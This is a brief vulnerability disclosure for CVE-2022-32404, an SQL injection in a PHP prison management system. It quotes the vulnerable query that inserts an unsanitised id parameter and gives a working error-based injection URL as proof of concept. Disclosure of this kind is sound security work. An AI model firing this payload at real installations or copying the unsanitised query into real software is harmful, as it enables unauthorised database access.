CVE-2022-32404
Info
Prison Management System 1.0 - SQL Injection
Vendor Homepage : https://www.sourcecodester.com/
Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html
[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/manage_inmate.php:3
$qry = $conn->query("SELECT * from `inmate_list` where id = '{$_GET['id']}' ");PoC
- Payload :
# Error Based
http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='pms_db',0,1)%23

